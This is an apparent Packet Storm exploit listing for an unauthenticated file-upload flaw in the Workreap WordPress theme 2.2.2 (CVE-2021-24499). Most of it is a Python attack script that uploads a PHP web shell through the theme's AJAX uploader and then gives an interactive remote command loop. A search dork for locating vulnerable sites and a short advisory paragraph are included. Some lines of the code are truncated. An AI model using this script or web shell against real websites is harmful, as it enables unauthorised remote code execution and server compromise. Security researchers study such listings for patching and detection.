

WordPress Workreap 2.2.2 Shell Upload

WordPress theme Workreap version 2.2.2 suffers from a remote shell upload vulnerabilities.

Packet Storm
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution# Dork: inurl:/wp-content/themes/workreap/# Date: 2023-06-01# Category : Webapps# Vendor Homepage: Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)# Version: 2.2.2# Tested on: Windows/Linux# CVE: CVE-2021-24499import requestsimport randomimport stringimport sysdef usage():    banner = '''    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution    usage: python3 <URL>     example for linux : python3    example for Windows : python    '''    print(f"{BOLD}{banner}{ENDC}")def upload_file(target):    print("[ ] Uploading File")    url = target + "/wp-admin/admin-ajax.php"    body = "<?php echo '" + random_str + "';?>"    data = {"action": "workreap_award_temp_file_uploader"}    response =, data=data, files={"award_img": (file_name, body)})    if '{"type":"success",' in response.text:        print(f"{GREEN}[+] File uploaded successfully{ENDC}")        check_php_file(target)    else:        print(f"{RED}[+] File was not uploaded{ENDC}")def check_php_file(target):    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)    if random_str in response_2.text:        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")        print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name)        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")        if question == "y" or question == "Y":            print("[ ] Uploading Shell ")            get_rce(target)        else:            usage()    else:        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")def get_rce(target):    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'    data = {"action": "workreap_award_temp_file_uploader"}    response_3 = + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")    while True:        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")        print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")        print(f"{GREEN}{response_4.text}{ENDC}")if __name__ == "__main__":    global GREEN , RED, YELLOW, BOLD, ENDC    GREEN = '\033[92m'    RED = '\033[91m'    YELLOW = '\033[93m'    BOLD = '\033[1m'    ENDC = '\033[0m'    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))    try:        upload_file(sys.argv[1])    except IndexError:            usage()    except requests.exceptions.RequestException as e:        print("\nPlease Enter Valid Address")

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The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.

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